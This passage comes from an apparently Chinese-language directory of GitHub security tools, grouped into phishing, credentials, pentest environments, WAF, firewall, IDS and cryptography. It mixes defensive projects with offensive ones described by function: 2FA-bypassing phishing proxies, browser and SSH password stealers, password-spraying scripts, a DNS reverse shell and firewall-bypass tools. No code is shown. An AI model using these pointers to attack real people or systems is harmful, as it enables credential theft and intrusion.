[侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) | - [**754**星][4m] [Py] [threatexpress/domainhunter](https://github.com/threatexpress/domainhunter) Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names - 重复区段: [侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) | - [**658**星][18d] [Py] [thewhiteh4t/seeker](https://github.com/thewhiteh4t/seeker) Accurately Locate Smartphones using Social Engineering - [**342**星][2m] [Py] [raikia/uhoh365](https://github.com/raikia/uhoh365) A script that can see if an email address is valid in Office365 (user/email enumeration). This does not perform any login attempts, is unthrottled, and is incredibly useful for social engineering assessments to find which emails exist and which don't. ### <a id="f30507893511f89b19934e082a54023e"></a>社工 - [**4966**星][4d] [Py] [trustedsec/social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here. ### <a id="290e9ae48108d21d6d8b9ea9e74d077d"></a>钓鱼&&Phish - [**8455**星][8d] [Py] [wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) 流氓AP框架, 用于RedTeam和Wi-Fi安全测试 - 重复区段: [无线->未分类-WiFi](#d4efda1853b2cb0909727188116a2a8c) | - [**4242**星][4d] [Go] [gophish/gophish](https://github.com/gophish/gophish) 网络钓鱼工具包 - [**2829**星][2m] [Go] [kgretzky/evilginx2](https://github.com/kgretzky/evilginx2) 独立的MITM攻击工具,用于登录凭证钓鱼,可绕过双因素认证 - [**2131**星][2m] [Py] [elceef/dnstwist](https://github.com/elceef/dnstwist) 域名置换引擎,用于检测打字错误,网络钓鱼和企业间谍活动 - 重复区段: [侦察->工具->DNS](#a695111d8e30d645354c414cb27b7843) | - [**1400**星][9m] [JS] [anttiviljami/browser-autofill-phishing](https://github.com/anttiviljami/browser-autofill-phishing) A simple demo of phishing by abusing the browser autofill feature - [**1369**星][10m] [HTML] [thelinuxchoice/blackeye](https://github.com/thelinuxchoice/blackeye) The most complete Phishing Tool, with 32 templates +1 customizable - [**1019**星][22d] [Py] [securestate/king-phisher](https://github.com/securestate/king-phisher) Phishing Campaign Toolkit - [**996**星][2m] [Py] [x0rz/phishing_catcher](https://github.com/x0rz/phishing_catcher) 使用Certstream 捕获钓鱼域名 - [**968**星][19d] [HTML] [darksecdevelopers/hiddeneye](https://github.com/darksecdevelopers/hiddeneye) Modern Phishing Tool With Advanced Functionality And Multiple Tunnelling Services [ Android-Support-Available ] - [**918**星][8m] [HTML] [thelinuxchoice/shellphish](https://github.com/thelinuxchoice/shellphish) 针对18个社交媒体的钓鱼工具:Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest - [**842**星][1m] [PHP] [raikia/fiercephish](https://github.com/Raikia/FiercePhish) FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns, schedule sending of emails, and much more. - [**537**星][2m] [Py] [shellphish/driller](https://github.com/shellphish/driller) augmenting AFL with symbolic execution! - [**460**星][4d] [Py] [angr/rex](https://github.com/angr/rex) Shellphish's automated exploitation engine, originally created for the Cyber Grand Challenge. - [**351**星][5m] [Py] [tatanus/spf](https://github.com/tatanus/spf) SpeedPhishing Framework - [**300**星][11m] [Py] [mr-un1k0d3r/catmyphish](https://github.com/Mr-Un1k0d3r/CatMyPhish) Search for categorized domain - [**274**星][1m] [Go] [muraenateam/muraena](https://github.com/muraenateam/muraena) Muraena is an almost-transparent reverse proxy aimed at automating phishing and post-phishing activities. - [**242**星][3m] [Py] [atexio/mercure](https://github.com/atexio/mercure) 对员工进行网络钓鱼的培训 - [**233**星][1y] [Jupyter Notebook] [wesleyraptor/streamingphish](https://github.com/wesleyraptor/streamingphish) 使用受监督的机器学习, 从证书透明度(Certificate Transparency)日志中检测钓鱼域名 - [**228**星][4m] [Py] [duo-labs/isthislegit](https://github.com/duo-labs/isthislegit) 收集、分析和回复网络钓鱼邮件的框架 - [**218**星][9m] [Go] [joncooperworks/judas](https://github.com/joncooperworks/judas) a phishing proxy - [**207**星][3d] [JS] [409h/etheraddresslookup](https://github.com/409h/etheraddresslookup) Adds links to strings that look like Ethereum addresses to your favourite blockchain explorer. Adds protection against private key phishing. Offers custom site bookmarks. - [**205**星][3m] [Py] [dionach/phemail](https://github.com/dionach/phemail) PhEmail is a python open source phishing email tool that automates the process of sending phishing emails as part of a social engineering test ### <a id="ab3e6e6526d058e35c7091d8801ebf3a"></a>鱼叉攻击 *** ## <a id="8f6c7489870c7358c39c920c83fa2b6b"></a>文章 ### <a id="d7e332e9e235fd5a60687800f5ce184c"></a>新添加的 # <a id="dc89c90b80529c1f62f413288bca89c4"></a>环境配置&&分析系统 *** ## <a id="9763d00cbe773aa10502dbe258f9c385"></a>工具 ### <a id="f5a7a43f964b2c50825f3e2fee5078c8"></a>未分类-Env - [**1678**星][2d] [HTML] [clong/detectionlab](https://github.com/clong/detectionlab) Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices - [**1433**星][11d] [Go] [crazy-max/windowsspyblocker](https://github.com/crazy-max/windowsspyblocker) - [**1308**星][18d] [C] [cisco-talos/pyrebox](https://github.com/cisco-talos/pyrebox) 逆向沙箱,基于QEMU,Python Scriptable - [**1229**星][11m] [JS] [mame82/p4wnp1_aloa](https://github.com/mame82/p4wnp1_aloa) 将 Rapsberry Pi Zero W 转变成灵活的渗透平台 - [**827**星][1m] [redhuntlabs/redhunt-os](https://github.com/redhuntlabs/redhunt-os) Virtual Machine for Adversary Emulation and Threat Hunting - [**800**星][3m] [sh4hin/androl4b](https://github.com/sh4hin/androl4b) 用于评估Android应用程序,逆向工程和恶意软件分析的虚拟机 - [**564**星][6m] [Ruby] [sliim/pentest-env](https://github.com/sliim/pentest-env) Pentest environment deployer (kali linux + targets) using vagrant and chef. - [**214**星][12m] [Shell] [proxycannon/proxycannon-ng](https://github.com/proxycannon/proxycannon-ng) 使用多个云环境构建私人僵尸网络, 用于渗透测试和RedTeaming ### <a id="cf07b04dd2db1deedcf9ea18c05c83e0"></a>Linux-Distro - [**2927**星][4d] [Py] [trustedsec/ptf](https://github.com/trustedsec/ptf) 创建基于Debian/Ubuntu/ArchLinux的渗透测试环境 - [**2375**星][18d] [security-onion-solutions/security-onion](https://github.com/security-onion-solutions/security-onion) Linux distro for intrusion detection, enterprise security monitoring, and log management - [**1489**星][t] [Shell] [blackarch/blackarch](https://github.com/blackarch/blackarch) BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. - [**347**星][t] [Shell] [archstrike/archstrike](https://github.com/archstrike/archstrike) An Arch Linux repository for security professionals and enthusiasts. Done the Arch Way and optimized for i686, x86_64, ARMv6, ARMv7 and ARMv8. ### <a id="4709b10a8bb691204c0564a3067a0004"></a>环境自动配置&&自动安装 - [**3142**星][3m] [PS] [fireeye/commando-vm](https://github.com/fireeye/commando-vm) Complete Mandiant Offensive VM (Commando VM), a fully customizable Windows-based pentesting virtual machine distribution. [email protected] - [**1748**星][2m] [PS] [fireeye/flare-vm](https://github.com/fireeye/flare-vm) 火眼发布用于 Windows 恶意代码分析的虚拟机:FLARE VM *** ## <a id="6454949c0d580904537643b8f4cd5a6b"></a>文章 ### <a id="873294ea77bc292b6fc4cfb2f9b40049"></a>新添加的 # <a id="c49aef477cf3397f97f8b72185c3d100"></a>密码&&凭证&&认证 *** ## <a id="862af330f45f21fbb0d495837fc7e879"></a>工具 ### <a id="20bf2e2fefd6de7aadbf0774f4921824"></a>未分类-Password - [**4889**星][13d] [Py] [alessandroz/lazagne](https://github.com/alessandroz/lazagne) Credentials recovery project - [**1457**星][1y] [Py] [d4vinci/cr3dov3r](https://github.com/d4vinci/cr3dov3r) Know the dangers of credential reuse attacks. - [**1384**星][24d] [Shell] [drduh/pwd.sh](https://github.com/drduh/pwd.sh) GPG symmetric password manager - [**1282**星][19d] [Py] [pyauth/pyotp](https://github.com/pyauth/pyotp) Python One-Time Password Library - [**1034**星][1y] [PS] [danmcinerney/icebreaker](https://github.com/danmcinerney/icebreaker) Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment - [**1000**星][10d] [Ruby] [mdp/rotp](https://github.com/mdp/rotp) Ruby One Time Password library - [**913**星][7d] [C] [cossacklabs/themis](https://github.com/cossacklabs/themis) 用于存储或通信的加密库,可用于Swift, ObjC, Android, С++, JS, Python, Ruby, PHP, Go。 - [**814**星][9m] [Py] [nccgroup/featherduster](https://github.com/nccgroup/featherduster) 自动化的密码分析工具,模块化 - [**805**星][2m] [Py] [hellman/xortool](https://github.com/hellman/xortool) 分析多字节异或密码 - [**740**星][1m] [Py] [ricterz/genpass](https://github.com/ricterz/genpass) 中国特色的弱口令生成器 - [**523**星][3m] [Py] [unode/firefox_decrypt](https://github.com/unode/firefox_decrypt) Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox/Thunderbird/SeaMonkey) profiles - [**507**星][3m] [Py] [byt3bl33d3r/sprayingtoolkit](https://github.com/byt3bl33d3r/sprayingtoolkit) Scripts to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient - [**485**星][1y] [JS] [emilbayes/secure-password](https://github.com/emilbayes/secure-password) Making Password storage safer for all - [**454**星][1y] [Go] [ncsa/ssh-auditor](https://github.com/ncsa/ssh-auditor) 扫描网络中的弱SSH密码 - [**399**星][2m] [Py] [x899/chrome_password_grabber](https://github.com/x899/chrome_password_grabber) Get unencrypted 'Saved Password' from Google Chrome - [**391**星][1y] [Shell] [mthbernardes/sshlooter](https://github.com/mthbernardes/sshlooter) Script to steal passwords from ssh. - [**369**星][4m] [Ruby] [digininja/pipal](https://github.com/digininja/pipal) Pipal, THE password analyser - [**361**星][21d] [Py] [davidtavarez/pwndb](https://github.com/davidtavarez/pwndb) Search for leaked credentials - [**341**星][11m] [C] [1clickman/3snake](https://github.com/1clickman/3snake) reads memory from sshd and sudo system calls that handle password based authentication - [**295**星][6m] [C#] [raikia/credninja](https://github.com/raikia/credninja) A multithreaded tool designed to identify if credentials are valid, invalid, or local admin valid credentials within a network at-scale via SMB, plus now with a user hunter - [**290**星][3m] [JS] [kspearrin/ff-password-exporter](https://github.com/kspearrin/ff-password-exporter) Easily export your passwords from Firefox. - [**289**星][7m] [Shell] [greenwolf/spray](https://github.com/Greenwolf/Spray) A Password Spraying tool for Active Directory Credentials by Jacob Wilkin(Greenwolf) - [**286**星][17d] [Py] [xfreed0m/rdpassspray](https://github.com/xfreed0m/rdpassspray) Python3 tool to perform password spraying using RDP - [**256**星][5m] [C] [rub-syssec/omen](https://github.com/rub-syssec/omen) Ordered Markov ENumerator - Password Guesser - [**212**星][4m] [Ruby] [bdmac/strong_password](https://github.com/bdmac/strong_password) Entropy-based password strength checking for Ruby and Rails. ### <a id="86dc226ae8a71db10e4136f4b82ccd06"></a>密码 - [**7035**星][t] [C] [hashcat/hashcat](https://github.com/hashcat/hashcat) 世界上最快最先进的密码恢复工具 - 重复区段: [后渗透->工具->未分类-post-exp](#12abc279c69d1fcf10692b9cb89bcdf7) | - [**5173**星][1y] [JS] [samyk/poisontap](https://github.com/samyk/poisontap) Exploits locked/password protected computers over USB, drops persistent WebSocket-based backdoor, exposes internal router, and siphons cookies using Raspberry Pi Zero & Node.js. - [**3209**星][2d] [C] [magnumripper/johntheripper](https://github.com/magnumripper/johntheripper) This is the official repo for John the Ripper, "Jumbo" version. The "bleeding-jumbo" branch is based on 1.9.0-Jumbo-1 which was released on May 14, 2019. An import of the "core" version of john this jumbo was based on (or newer) is found in the "master" branch (CVS: - [**2583**星][2m] [C] [huntergregal/mimipenguin](https://github.com/huntergregal/mimipenguin) dump 当前Linux用户的登录密码 - [**1162**星][8m] [Py] [mebus/cupp](https://github.com/mebus/cupp) Common User Passwords Profiler (CUPP) - [**874**星][5m] [Go] [fireeye/gocrack](https://github.com/fireeye/gocrack) 火眼开源的密码破解工具,可以跨多个 GPU 服务器执行任务 - [**852**星][3m] [Go] [ukhomeoffice/repo-security-scanner](https://github.com/ukhomeoffice/repo-security-scanner) CLI tool that finds secrets accidentally committed to a git repo, eg passwords, private keys - [**652**星][1y] [Java] [faizann24/wifi-bruteforcer-fsecurify](https://github.com/faizann24/wifi-bruteforcer-fsecurify) Android app,无需 Root 即可爆破 Wifi 密码 - [**602**星][7m] [C] [hashcat/hashcat-utils](https://github.com/hashcat/hashcat-utils) Small utilities that are useful in advanced password cracking - [**598**星][1y] [Py] [brannondorsey/passgan](https://github.com/brannondorsey/passgan) A Deep Learning Approach for Password Guessing ( - [**593**星][4m] [Py] [thewhiteh4t/pwnedornot](https://github.com/thewhiteh4t/pwnedornot) OSINT Tool for Finding Passwords of Compromised Email Addresses - [**493**星][1y] [PS] [dafthack/domainpasswordspray](https://github.com/dafthack/domainpasswordspray) DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS! - [**353**星][8m] [Py] [iphelix/pack](https://github.com/iphelix/pack) PACK (Password Analysis and Cracking Kit) - [**334**星][2m] [CSS] [guyoung/captfencoder](https://github.com/guyoung/captfencoder) CaptfEncoder是一款跨平台网络安全工具套件,提供网络安全相关编码转换、古典密码、密码学、特殊编码等工具,并聚合各类在线工具。 - [**333**星][26d] [JS] [auth0/repo-supervisor](https://github.com/auth0/repo-supervisor) Serverless工具,在pull请求中扫描源码,搜索密码及其他秘密 ### <a id="764122f9a7cf936cd9bce316b09df5aa"></a>认证&&Authenticate - [**901**星][1m] [Go] [smallstep/cli](https://github.com/smallstep/cli) 🧰 A zero trust swiss army knife for working with X509, OAuth, JWT, OATH OTP, etc. - [**665**星][9m] [C] [samdenty/wi-pwn](https://github.com/samdenty/Wi-PWN) performs deauth attacks on cheap Arduino boards - [**298**星][15d] [Java] [shred/acme4j](https://github.com/shred/acme4j) a protocol that a certificate authority (CA) and an applicant can use to automate the process of verification and certificate issuance - [**281**星][4m] [Java] [ztosec/secscan-authcheck](https://github.com/ztosec/secscan-authcheck) 越权检测工具 - [**214**星][1y] [C#] [leechristensen/spoolsample](https://github.com/leechristensen/spoolsample) PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well. *** ## <a id="5fda419e854b390c8361d347f48607ce"></a>文章 ### <a id="776c034543a65be69c061d1aafce3127"></a>新添加的 # <a id="43b0310ac54c147a62c545a2b0f4bce2"></a>辅助周边 *** ## <a id="569887799ee0148230cc5d7bf98e96d0"></a>未分类-Assist - [**26031**星][3d] [Py] [certbot/certbot](https://github.com/certbot/certbot) Certbot is EFF's tool to obtain certs from Let's Encrypt and (optionally) auto-enable HTTPS on your server. It can also act as a client for any other CA that uses the ACME protocol. - [**7784**星][2d] [JS] [gchq/cyberchef](https://github.com/gchq/cyberchef) The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis - [**4909**星][3m] [Rust] [sharkdp/hexyl](https://github.com/sharkdp/hexyl) 命令行中查看hex - [**4402**星][] [JS] [cure53/dompurify](https://github.com/cure53/dompurify) a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks. Demo: - [**3239**星][7m] [HTML] [leizongmin/js-xss](https://github.com/leizongmin/js-xss) Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist - [**3097**星][8d] [Shell] [trimstray/htrace.sh](https://github.com/trimstray/htrace.sh) My simple Swiss Army knife for http/https troubleshooting and profiling. - [**1223**星][1y] [Go] [cloudflare/redoctober](https://github.com/cloudflare/redoctober) Go server for two-man rule style file encryption and decryption. - [**1022**星][9m] [Go] [maliceio/malice](https://github.com/maliceio/malice) 开源版的VirusTotal - [**508**星][6d] [Py] [certtools/intelmq](https://github.com/certtools/intelmq) IntelMQ is a solution for IT security teams for collecting and processing security feeds using a message queuing protocol. - [**481**星][5m] [JS] [ehrishirajsharma/swiftnessx](https://github.com/ehrishirajsharma/swiftnessx) A cross-platform note-taking & target-tracking app for penetration testers. *** ## <a id="86d5daccb4ed597e85a0ec9c87f3c66f"></a>TLS&&SSL&&HTTPS - [**22020**星][23d] [Go] [filosottile/mkcert](https://github.com/filosottile/mkcert) A simple zero-config tool to make locally trusted development certificates with any names you'd like. - [**4322**星][12d] [Py] [diafygi/acme-tiny](https://github.com/diafygi/acme-tiny) A tiny script to issue and renew TLS certs from Let's Encrypt - [**1694**星][9d] [HTML] [chromium/badssl.com](https://github.com/chromium/badssl.com) - [**1230**星][1m] [Go] [jsha/minica](https://github.com/jsha/minica) minica is a small, simple CA intended for use in situations where the CA operator also operates each host where a certificate will be used. - [**1211**星][2d] [Go] [smallstep/certificates](https://github.com/smallstep/certificates) 私有的证书颁发机构(X.509和SSH)和ACME服务器,用于安全的自动证书管理,因此您可以在SSH和SSO处使用TLS - [**833**星][10m] [Py] [ietf-wg-acme/acme](https://github.com/ietf-wg-acme/acme) A protocol for automating certificate issuance - [**740**星][21d] [Shell] [dokku/dokku-letsencrypt](https://github.com/dokku/dokku-letsencrypt) BETA: Automatic Let's Encrypt TLS Certificate installation for dokku - [**691**星][5m] [C++] [google/certificate-transparency](https://github.com/google/certificate-transparency) Auditing for TLS certificates. - [**512**星][1m] [Java] [rub-nds/tls-attacker](https://github.com/rub-nds/tls-attacker) TLS-Attacker is a Java-based framework for analyzing TLS libraries. It is developed by the Ruhr University Bochum ( - [**469**星][3m] [Go] [square/certigo](https://github.com/square/certigo) A utility to examine and validate certificates in a variety of formats - [**279**星][1m] [Shell] [trimstray/mkchain](https://github.com/trimstray/mkchain) 建立从根证书到最终用户证书的有效的SSL证书链, 修复不完整的证书链并下载所有缺少的CA证书 - [**229**星][7m] [Shell] [r00t-3xp10it/meterpreter_paranoid_mode-ssl](https://github.com/r00t-3xp10it/meterpreter_paranoid_mode-ssl) Meterpreter Paranoid Mode - SSL/TLS connections - [**225**星][12m] [Shell] [nviso-be/magisktrustusercerts](https://github.com/nviso-be/magisktrustusercerts) A Magisk module that automatically adds user certificates to the system root CA store # <a id="946d766c6a0fb23b480ff59d4029ec71"></a>防护&&Defense *** ## <a id="0abd611fc3e9a4d9744865ca6e47a6b2"></a>工具 ### <a id="7a277f8b0e75533e0b50d93c902fb351"></a>未分类-Defense - [**9862**星][9m] [imthenachoman/how-to-secure-a-linux-server](https://github.com/imthenachoman/how-to-secure-a-linux-server) An evolving how-to guide for securing a Linux server. - [**747**星][12m] [Py] [infobyte/spoilerwall](https://github.com/infobyte/spoilerwall) Spoilerwall introduces a brand new concept in the field of network hardening. Avoid being scanned by spoiling movies on all your ports! - [**657**星][6m] [TeX] [bettercrypto/applied-crypto-hardening](https://github.com/bettercrypto/applied-crypto-hardening) Best Current Practices regarding secure online communication and configuration of services using cryptography. - [**639**星][2d] [Py] [binarydefense/artillery](https://github.com/binarydefense/artillery) The Artillery Project is an open-source blue team tool designed to protect Linux and Windows operating systems through multiple methods. - [**589**星][21d] [Ruby] [dev-sec/ansible-ssh-hardening](https://github.com/dev-sec/ansible-ssh-hardening) This Ansible role provides numerous security-related ssh configurations, providing all-round base protection. - [**570**星][29d] [Py] [graphenex/graphenex](https://github.com/graphenex/graphenex) Automated System Hardening Framework - [**499**星][8m] [ernw/hardening](https://github.com/ernw/hardening) Repository of Hardening Guides - [**241**星][20d] [Py] [a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check) A script for checking the hardening options in the Linux kernel config - [**217**星][27d] [Puppet] [dev-sec/puppet-os-hardening](https://github.com/dev-sec/puppet-os-hardening) This puppet module provides numerous security-related configurations, providing all-round base protection. ### <a id="784ea32a3f4edde1cd424b58b17e7269"></a>WAF - [**5094**星][2m] [Lua] [alexazhou/verynginx](https://github.com/alexazhou/verynginx) A very powerful and friendly nginx base on lua-nginx-module( openresty ) which provide WAF, Control Panel, and Dashboards. - [**3294**星][3m] [C] [nbs-system/naxsi](https://github.com/nbs-system/naxsi) NAXSI is an open-source, high performance, low rules maintenance WAF for NGINX - [**3207**星][1m] [C++] [spiderlabs/modsecurity](https://github.com/spiderlabs/modsecurity) ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx that is developed by Trustwave's SpiderLabs. It has a robust event-based programming language which provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analys… - [**619**星][3m] [Py] [3xp10it/xwaf](https://github.com/3xp10it/xwaf) waf 自动爆破(绕过)工具 - [**617**星][4m] [Lua] [jx-sec/jxwaf](https://github.com/jx-sec/jxwaf) JXWAF(锦衣盾)是一款基于openresty(nginx+lua)开发的web应用防火墙 - [**552**星][8m] [Py] [s0md3v/blazy](https://github.com/s0md3v/Blazy) Blazy is a modern login bruteforcer which also tests for CSRF, Clickjacking, Cloudflare and WAF . - [**540**星][4d] [Go] [janusec/janusec](https://github.com/janusec/janusec) Janusec Application Gateway, a Golang based application security solution which provides WAF (Web Application Firewall), CC attack defense, unified web administration portal, private key protection, web routing and scalable load balancing. - [**481**星][8m] [Java] [chengdedeng/waf](https://github.com/chengdedeng/waf) - [**452**星][3d] [PHP] [akaunting/firewall](https://github.com/akaunting/firewall) Web Application Firewall (WAF) package for Laravel - [**433**星][9m] [Py] [aws-samples/aws-waf-sample](https://github.com/aws-samples/aws-waf-sample) This repository contains example scripts and sets of rules for the AWS WAF service. Please be aware that the applicability of these examples to specific workloads may vary. - [**423**星][6d] [Py] [awslabs/aws-waf-security-automations](https://github.com/awslabs/aws-waf-security-automations) This solution automatically deploys a single web access control list (web ACL) with a set of AWS WAF rules designed to filter common web-based attacks. - [**415**星][5d] [C#] [jbe2277/waf](https://github.com/jbe2277/waf) Win Application Framework (WAF) is a lightweight Framework that helps you to create well structured XAML Applications. - [**412**星][11m] [C] [titansec/openwaf](https://github.com/titansec/openwaf) Web security protection system based on openresty - [**384**星][6d] [PHP] [terrylinooo/shieldon](https://github.com/terrylinooo/shieldon) Web Application Firewall (WAF) for PHP. - [**248**星][1y] [Py] [warflop/cloudbunny](https://github.com/warflop/cloudbunny) CloudBunny is a tool to capture the real IP of the server that uses a WAF as a proxy or protection. In this tool we used three search engines to search domain information: Shodan, Censys and Zoomeye. - [**216**星][1m] [Py] [stamparm/identywaf](https://github.com/stamparm/identywaf) Blind WAF identification tool - [**209**星][7m] [C] [coolervoid/raptor_waf](https://github.com/coolervoid/raptor_waf) Raptor - WAF - Web application firewall using DFA [ Current version ] - Beta ### <a id="ce6532938f729d4c9d66a5c75d1676d3"></a>防火墙&&FireWall - [**4209**星][2m] [Py] [evilsocket/opensnitch](https://github.com/evilsocket/opensnitch) opensnitch:Little Snitch 应用程序防火墙的 GNU/Linux 版本。(Little Snitch:Mac操作系统的应用程序防火墙,能防止应用程序在你不知道的情况下自动访问网络) - [**3283**星][11d] [ObjC] [objective-see/lulu](https://github.com/objective-see/lulu) LuLu is the free macOS firewall - [**1542**星][6d] [Java] [ukanth/afwall](https://github.com/ukanth/afwall) AFWall+ (Android Firewall +) - iptables based firewall for Android - [**1095**星][3m] [PHP] [antonioribeiro/firewall](https://github.com/antonioribeiro/firewall) Firewall package for Laravel applications - [**1049**星][8d] [Shell] [firehol/firehol](https://github.com/firehol/firehol) A firewall for humans... - [**852**星][20d] [trimstray/iptables-essentials](https://github.com/trimstray/iptables-essentials) Common Firewall Rules and Commands. - [**567**星][7m] [Go] [sysdream/chashell](https://github.com/sysdream/chashell) Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks. - [**468**星][6m] [Shell] [vincentcox/bypass-firewalls-by-dns-history](https://github.com/vincentcox/bypass-firewalls-by-dns-history) Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters. - [**279**星][11d] [Shell] [geerlingguy/ansible-role-firewall](https://github.com/geerlingguy/ansible-role-firewall) Ansible Role - iptables Firewall configuration. - [**261**星][2m] [C#] [wokhansoft/wfn](https://github.com/wokhansoft/wfn) Windows Firewall Notifier extends the default Windows embedded firewall by allowing to handle and notify about outgoing connections, offers real time connections monitoring, connections map, bandwidth usage monitoring and more... - [**260**星][4d] [Ruby] [puppetlabs/puppetlabs-firewall](https://github.com/puppetlabs/puppetlabs-firewall) Puppet Firewall Module - [**240**星][7d] [Shell] [essandess/macos-fortress](https://github.com/essandess/macos-fortress) Firewall and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers with Anti-Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav) - [**220**星][1y] [Go] [maksadbek/tcpovericmp](https://github.com/maksadbek/tcpovericmp) TCP implementation over ICMP protocol to bypass firewalls ### <a id="ff3e0b52a1477704b5f6a94ccf784b9a"></a>IDS&&IPS - [**2938**星][4d] [Zeek] [zeek/zeek](https://github.com/zeek/zeek) Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. - [**2852**星][10d] [C] [ossec/ossec-hids](https://github.com/ossec/ossec-hids) 入侵检测系统 - [**1622**星][2m] [Go] [ysrc/yulong-hids](https://github.com/ysrc/yulong-hids) 一款由 YSRC 开源的主机入侵检测系统 - [**1325**星][9d] [C] [oisf/suricata](https://github.com/OISF/suricata) a network IDS, IPS and NSM engine - [**581**星][5d] [Py] [0kee-team/watchad](https://github.com/0kee-team/watchad) AD Security Intrusion Detection System - [**512**星][5m] [C] [decaf-project/decaf](https://github.com/decaf-project/DECAF) DECAF (short for Dynamic Executable Code Analysis Framework) is a binary analysis platform based on QEMU. This is also the home of the DroidScope dynamic Android malware analysis platform. DroidScope is now an extension to DECAF. - [**499**星][8m] [Shell] [stamusnetworks/selks](https://github.com/stamusnetworks/selks) A Suricata based IDS/IPS distro - [**383**星][7m] [jnusimba/androidsecnotes](https://github.com/jnusimba/androidsecnotes) some learning notes about Android Security - [**298**星][4d] [C] [ebwi11/agentsmith-hids](https://github.com/EBWi11/AgentSmith-HIDS) By Kprobe technology Open Source Host-based Intrusion Detection System(HIDS), from E_Bwill. - [**248**星][1y] [Perl] [mrash/psad](https://github.com/mrash/psad) iptables 的入侵检测和日志分析 - [**225**星][1m] [Py] [secureworks/dalton](https://github.com/secureworks/dalton) 使用预定义/指定的规则, 针对IDS传感器(例如Snort/Suricata)进行网络数据包捕获 ### <a id="6543c237786d1f334d375f4d9acdeee4"></a>隐私保护&&Privacy - [**3236**星][5m] [Go] [meshbird/meshbird](https://github.com/meshbird/meshbird) cloud-native multi-region multi-cloud decentralized private networking - [**1069**星][20d] [Py] [yelp/detect-secrets](https://github.com/yelp/detect-secrets) An enterprise friendly way of detecting and preventing secrets in code. *** ## <a id="5aac7367edfef7c63fc95afd6762b773"></a>文章 ### <a id="04aac0e81b87788343930e9dbf01ba9c"></a>新添加的 # <a id="52b481533d065d9e80cfd3cca9d91c7f"></a>SoftwareDefinedRadio *** ## <a id="015984b1dae0c9aa03b3aa74ea449f3f"></a>工具 - [**934**星][1y] [C++] [miek/inspectrum](https://github.com/miek/inspectrum) analysing captured signals, primarily from software-defined radio receivers. - [**454**星][10m] [C] [martinmarinov/tempestsdr](https://github.com/martinmarinov/tempestsdr) Remote video eavesdropping using a software-defined radio platform - [**369**星][4d] [Py] [p1sec/qcsuper](https://github.com/p1sec/qcsuper) QCSuper is a tool communicating with Qualcomm-based phones and modems, allowing to capture raw 2G/3G/4G radio frames, among other things. *** ## <a id="043e62cc373eb3e7b3910b622cf220d8"></a>文章 # <a id="507f1a48f4709abb1c6b0d2689fd15e6"></a>LOLBin&&LOLScript *** ## <a id="ec32edc7b3e441f29c70f6e9bca0174a"></a>工具 - [**1433**星][1m] [XSLT] [lolbas-project/lolbas](https://github.com/lolbas-project/lolbas) Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts) - [**1349**星][1y] [XSLT] [api0cradle/lolbas](https://github.com/api0cradle/lolbas) Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts) *** ## <a id="9bffad3ac781090ab31d4013bf858dd9"></a>文章 # <a id="e25d233159b1dc40898ff0c74574f790"></a>日志&&Log *** ## <a id="13df0f4d5c7a1386b329fd9e43d8fc15"></a>工具 *** ## <a id="06e7d46942d5159d19aa5c36f66f174a"></a>文章 # <a id="9b026a07fdf243c6870ce91f00191214"></a>威胁狩猎&&ThreatHunt *** ## <a id="b911aad7512e253660092942e06d00ad"></a>工具 ### <a id="0b27f97199330c4945572a1f9c229000"></a>未分类 - [**1998**星][10d] [Py] [momosecurity/aswan](https://github.com/momosecurity/aswan) 陌陌风控系统静态规则引擎,零基础简易便捷的配置多种复杂规则,实时高效管控用户异常行为。 *** ## <a id="f613271a55b177f626b42b8c728a0b1c"></a>文章 ### <a id="3828e67170e5db714c9c16f663b42a5e"></a>新添加的 # <a id="d6b02213a74372407371f77dd6e39c99"></a>Crypto&&加密&&密码学 *** ## <a id="41d260119ad54db2739a9ae393bd87a5"></a>工具 - [**2151**星][5d] [Java] [google/wycheproof](https://github.com/google/wycheproof) Project Wycheproof tests crypto libraries against known attacks. - [**1077**星][3m] [C] [tpruvot/cpuminer-multi](https://github.com/tpruvot/cpuminer-multi) crypto cpuminer (linux + windows) - [**448**星][14d] [Py] [sidechannelmarvels/deadpool](https://github.com/sidechannelmarvels/deadpool) Repository of various public white-box cryptographic implementations and their practical attacks. - [**378**星][2m] [C++] [crypto2011/idr](https://github.com/crypto2011/idr) Interactive Delphi Reconstructor - [**214**星][5m] [Shell] [cryptolok/crykex](https://github.com/cryptolok/crykex) Linux Memory Cryptographic Keys Extractor *** ## <a id="cc043f672c90d4b834cdae80bfbe8851"></a>文章 # <a 